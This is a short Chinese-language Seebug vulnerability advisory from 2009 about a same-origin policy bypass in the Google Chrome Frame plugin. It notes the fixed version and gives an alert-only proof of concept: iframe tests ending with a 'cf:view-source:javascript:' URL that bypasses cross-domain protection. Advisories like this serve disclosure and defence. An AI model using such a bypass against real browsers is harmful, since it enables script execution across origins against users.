Google Chrome帧同源策略绕过漏洞

2009-11-20T00:00:00
ID SSV:12669
Type seebug
Reporter Root
Modified 2009-11-20T00:00:00

Description

Bugraq ID: 37067

Google Chrome Frame是一款浏览器插件,可使用户的浏览器外观依然是IE的菜单和界面,但实际是Google Chrome浏览器内核浏览网页。 Google Chrome Frame存在安全漏洞允许攻击者绕过同源策略并执行特权操作。

Google Chrome Frame 4.0.223.9 Google Chrome Frame 4.0.245.1 (Official Build 31970)已经修复此漏洞,建议用户下载使用: http://www.google.com/chromeframe

                                        
                                            
                                                建立如下HTML文档并进行测试:
<iframe src="javascript:alert(1)></iframe>
=> 打开iframe并执行警告
(这是正确的)
<iframe src="cf:javascript:alert(1)></iframe> 
上面不能成功执行, 不能限制警告(正确)
但如下情况存在一个缺陷=>
<iframe src="cf:view-source:javascript:alert(1)></iframe>
如上代码可在本地或远程安全上下文或通过地址栏执行,成功绕过跨域保护。